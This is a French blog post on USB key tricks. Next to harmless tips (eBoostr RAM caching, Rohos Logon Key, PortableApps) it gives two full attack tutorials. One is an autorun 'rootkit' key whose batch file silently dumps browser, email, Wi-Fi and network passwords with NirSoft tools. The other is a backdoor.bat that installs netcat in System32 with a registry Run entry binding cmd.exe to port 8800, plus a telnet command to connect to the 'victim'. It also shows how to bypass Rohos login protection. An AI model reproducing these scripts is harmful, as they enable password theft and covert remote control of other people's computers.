Tout ce que vous ne savez pas sur les clés USB
La majorité des personnes
savent très bien que la clé USB est un support de stockage amovible, c’est ce qui leur fait penser qu’une clé
USB permet uniquement de stocker des fichiers à partir de tout système disposant
de prises USB ou de transférer des données entre ordinateurs. Or la clé USB peut être utilisée
de plusieurs manières différentes. Aujourd’hui, je vais vous
montrer qu’il existe d’autres fonctions plus intéressantes qu’on peut utiliser
à l’aide d’une simple clé USB.
1. Transformer votre clé USB à une barrette mémoire RAM
Une clé USB peut être utilisée
pour améliorer les performances de votre ordinateur et augmenter la vitesse de
son fonctionnement. L’astuce consiste à utiliser une clé USB
pour augmenter la mémoire de votre ordinateur et booster ses performances
à l’aide de logiciel eBoostr.
2. Sécuriser votre PC avec une clé USB
On peut aussi
utiliser une clé USB pour sécuriser son PC. L’utilitaire Rohos Logon Key
fera en sorte que votre ordinateur s’ouvrira automatiquement au moment où vous
insérerez la clé USB et se verrouillera lorsque vous la retirerez. Vous pourrez
donc quitter votre ordinateur en toute sérénité.
3. Création d’une clé USB rootkit
Une autre fonction qu’on peut
l’utiliser avec une clé USB, c’est la récupération des mots de passe d’un
ordinateur. La clé USB s’exécute automatiquement et récupère la plupart des
mots de passe stockés sur votre ordinateur. Il est vraiment très utile surtout
quand on perd les mots de passe.
4. Injecter un backdoor dans une machine Windows avec une clé USB
On peut aussi utiliser une clé
USB pour accéder à votre PC à distance depuis n’importe quelle machine.
5. Emporter dans une clé USB vos logiciels préférés sans avoir besoin de les installer
Enfin, une autre
fonction qui pourrait vous intéresser : c’est d’utiliser des logiciels stockés
sur votre clé USB sans avoir besoin de les installer. Pour cela, il faut
installer le programme gratuit PortableApps. Il devient alors très facile d’ajouter vos logiciels préférés
au lanceur d’applications portable « PortableApps ».
Un outil principalement destiné aux développeurs qui enrichit et complète la
suite logicielle référence en la matière. Le logiciel Open Source PortableApps propose déjà un panel très
large d’applications portables : Firefox, LibreOffice, Google Chrome, Skype ou
encore Dropbox. Ce lanceur vous permet d’utiliser les logiciels stockés sur la
clé USB depuis un autre PC sans avoir à les installer. Comme nous l’avons vu
précédemment, une clé USB peut servir à autre chose qu’à stocker des
données. Elle possède d’autres avantages.
Augmenter la RAM de son PC avec une clé USB
Vous avez besoin de plus de RAM ? Votre ordinateur
est très lent ? Vous aimerez avoir plus de RAM mais
vous n’avez pas les moyens d’acheter une barrette mémoire ?
Cette astuce va
sûrement améliorer les performances de votre ordinateur et augmenter la vitesse
de fonctionnement. Elle consiste à utiliser une clé USB
pour augmenter la mémoire de votre ordinateur et booster ses performances
à l’aide de logiciel eBoostr. eBoostr est un logiciel shareware qui utilise la
mémoire d’une clé USB ou d’une carte SD raccordé au PC pour l’allouer au cache
du système. Il utilise cette « mémoire tampon intelligente »
pour soulager le disque dur
et améliorer les temps d’accès au système, aux applications et aux
documents.
Comment
utiliser eBoostr pour augmenter la RAM de son PC ?
Tout d’abord, télécharger et installer eBoostr sur votre ordinateur. Ensuite redémarrer votre PC. Après le
redémarrage, une fenêtre va s’afficher. Cliquer sur continuer.
Une fois installé cliquer sur Ouvrir le panneau de contrôle pour le configurer. Branchez votre clé USB dans votre ordinateur
Après cochez “Détecter et utiliser la mémoire
système masquée”. Le système va détecter les
périphériques de stockage disponible à votre ordinateur.
Cochez les périphériques de stockage ou la clé USB que vous souhaitez utiliser comme mémoire, puis cliquez Suivant
Vous pouvez toujours mettre des fichiers dans votre clé ou la retirer, Windows détectera automatiquement le périphérique avec eBoostr au prochain branchement. La limite de cette technique est évidente : une clé USB est bien moins rapide que de la RAM.
Sécuriser
votre pc avec une clé USB
Lorsque vous vous éloignez de votre ordinateur,
n’importe qui peut alors l’utiliser et accéder à vos données. C’est pour
cela, il est important de verrouiller votre PC avec un mot de
passe à chaque fois que l’on ne l’utilise pas.
Au lieu de faire Ctrl + Alt + Suppr pour fermer votre session
vous pouvez utiliser Rohos Logon Key sur
une clé USB. Cet utilitaire fera en sorte que votre ordinateur s’ouvrira
automatiquement au moment où vous insérerez la clé USB et se verrouillera
lorsque vous la retirerez. Vous pourrez donc quitter votre ordinateur en toute
sérénité, puisqu’une fois la clé dans votre poche plus personne ne pourra
l’utiliser. Je vais vous d’écrire en détails, comment configurer une clé USB
comme clé d’accès à votre ordinateur et son utilisation pour une augmentation
de sécurité de votre PC.
Comment sécuriser votre pc avec une clé USB ?
Pour commencer,
nous allons utilisez le logiciel Rohos Logon Key qui est
une version shareware c’est un outil d’authentification par clé
USB. Au lieu d’entrer un mot de passe difficile à mémoriser, vous
n’aurez qu’à brancher la bonne clé USB. Il suffit de le télécharger et suivre
l’installation.
Ensuite choisissez l’option “Configurer une clé USB”. Un
dialogue va apparaître en vous priant d’entrer votre mot de passe.
Le meilleur étant toujours gardé pour la fin, l’originalité de Rohos Logon Key ne s’arrête pas là, puisqu’il vous permettra d’utiliser n’importe quel dispositif de stockage afin de faire l’identification. Il sera possible par exemple d’utiliser votre téléphone portable avec la fonction Bluetooth.
De plus, Rohos Logon Key protège par défaut votre ordinateur en Mode Sans Echec. Ainsi, si l’utilisateur a activé l’option « Autoriser l’ouverture de Windows uniquement avec une clé USB » et qu’il n’a pas la clé USB (celle-ci étant endommagée, perdue ou reformatée, ou s’il a oublié son code PIN), il sera alors impossible d’ouvrir de session sur le système à l’aide de méthodes standard. Dans ce cas si vous utilisez Un PC familial ou un portable, non connecté sur un LAN, Il suffit de démarrer votre pc avec un autre système d’exploitation ou un Live CD Windows et supprimer le fichier c: program files rohoswelcome.exe, Redémarrez l’ordinateur en Mode Sans Echec et authentifiez-vous en vous servant de votre mot de passe. Désinstallez le programme Rohos Logon Key puis redémarrez l’ordinateur en mode normal et authentifiez-vous avec votre mot de passe.
HACK : Création d’une clé USB rootkit
Aujourd’hui nous allons voir comment créer une clé USB qui récupère les mots de passe d’un ordinateur.
Cette clé USB s’exécute
automatiquement et récupère la plupart des mots de passe stocker sur votre
ordinateur. Il est vraiment très utile surtout quand on a perdu ses mots de passe. Pour créer notre clé USB rootkit on doit suivre les étapes ci-dessous :
Étape 1 : Nous allons dans un
premier temps télécharger quelques outils qui nous permettent de récupérer les
mots de passe des applications les plus courantes. Toutes ces applications sont
issues du site Nirsoft http://www.nirsoft.net/.
Maintenant nous
allons placer tous les fichiers .exe
sur notre clé USB.
Étape 2 : Ensuite il faut créer un fichier launch.bat qui va ouvrir automatiquement les programmes de récupération de mot de passe et il va stocker les résultats dans un fichier texte. Pour cela : on doit créer un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous.
@echo off
start
WebBrowserPassView.exe /stext dossier1/WebBrowserPassView.txt
start mailpv.exe /stext dossier1/mailpv.txt
start WirelessKeyView.exe /stext dossier1/WirelessKeyView.txt
start netpass.exe /stext dossier1/netpass.txt
Attention à bien
vérifier que les noms des outils correspondent bien aux noms qui sont écrit
dans le fichier launch.bat.
Comme vous avez
pu le voir dans les lignes ci-dessus, lorsque launch.bat sera exécuté, ces logs seront envoyé dans un dossier
appelé dossier1. Il nous faut donc créer un
nouveau dossier et le nommer dossier1.
Étape 3 : Maintenant nous
allons créer le fichier autorun.inf. Le fichier
autorun.inf est un fichier texte enregistré à la racine d’un périphérique de
stockage (CD, Clé USB, etc.) permettant d’automatiser le lancement de certains
programmes lors de l’insertion d’un périphérique de stockage. Lorsque vous
insérez votre clé USB généralement une fenêtre apparaît en
nous demandant ce que l’on désire faire ! Dans cette fenêtre nous allons créer
une nouvelle option qui nous permettra (une fois cliquez dessus) de récupérer
les mots de passes de l’ordinateur et de les stockés dans le dossier créé dans
l’étape 2. Pour réaliser ceci on ouvre un nouveau document texte puis on insère
le code suivant :
[autorun]
open=launch.bat
ACTION=’Le nom de la nouvelle option’
Enfin on enregistre notre
fichier autorun.inf. Félicitation ! Votre clé
USB rootkit est
maintenant près à utiliser, il ne vous reste plus qu’à la tester.
Prendre le contrôle d’un PC à distance avec une Clé USB
Nous allons voir comment
créer une clé USB qui ouvre un backdoor sur
une machine Windows.
Ce rootkit
s’exécute automatiquement, crée un backdoor sur un PC Windows et vous permet de prendre le contrôle d’un PC à distance.
Comme d’habitude
l’objectif de ce cour, c’est de
montrer aux dirigeants d’entreprises à quel point l’utilisation des clés USB peut être dangereux. Ce qui est valable pour les entreprises ne l’est pas moins
pour les simples particuliers.
Prendre le
contrôle d’un PC à distance
Pour prendre le contrôle d’un PC à distance avec une Clé USB, il
faut suivre les étapes ci-dessus :
Télécharger l’outil Netcat : Tout d’abord, nous
allons créer un nouveau dossier sur notre clé USB. Ensuite nous allons
télécharger Netcat, un utilitaire
permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP. Vous pouvez
aussi utiliser l’outil Cryptcat, le clone de Netcat, à la seule condition que ce dernier chiffre ses
communications.
Télécharger Netcat pour windows : Apres le téléchargement de Netcat, on le dé-zippe dans le dossier crée récemment.
Créer
un script .bat
Ensuite nous
allons créer un fichier backdoor.bat. Ce petit fichier à deux objectifs :
·
Copier les fichiers du Netcat dans le dossier System32 de
l’ordinateur cible
·
Ajouter une valeur chaîne dans le
registre du PC victime pour que notre Backdoor
se lance à chaque démarrage.
Pour cela, nous allons créer un nouveau document texte avec bloc
note ou autres éditeur de texte et écrire le code ci-dessous :
copy *.* « %SYSTEMROOT%/System32 »
REG ADD « HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Run »
/v « backdoor » /t « REG_SZ » /d
« %SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800 »
Créer un fichier autorun
Maintenant, il
vous reste de créer le fichier autorun.inf. Dans cette étape, nous allons créer une nouvelle option dans la
fenêtre qui apparaît à l’insertion d’une USB, qui nous permettra (une fois
cliquez dessus) notre backdoor
s’installe sur l’ordinateur cible.
Pour réaliser ceci, ouvrez un nouveau document texte puis
insérez ce code :
[autorun]
open=backdoor.bat
ACTION= »donner un nom à cette action »
Enfin on enregistre le fichier sous la racine de la clé sous le
nom autorun.inf
Mettre en œuvre le backdoor crée
Après l’insertion de la clé USB, vous pouvez à partir de
n’importe quelle machine vous connectez sur le poste de la victime avec la
commande suivante :
telnet 192.168.1.17 8800
192.168.1.17 désigne l’adresse IP de la machine distant qu’il
vous faut remplacer. Et 8800 c’est le port utiliser pour se connecter.
Et voilà ! Avec
cette technique vous serez en mesure de prendre le contrôle d’un PC à distance. Vous pouvez faire ce qui vous chante : ouvrir des fichiers, lancer
une recherche, exécuter un programme…
Voici une liste
des commandes pour bien manipuler la machine à distance : Lise des commandes Windows
Pour vous déconnecter, tapez « logout ».
Faites-en bon usage. PS: cette astuce ne fonctionne pas sous Windows 10
Aucun commentaire:
Enregistrer un commentaire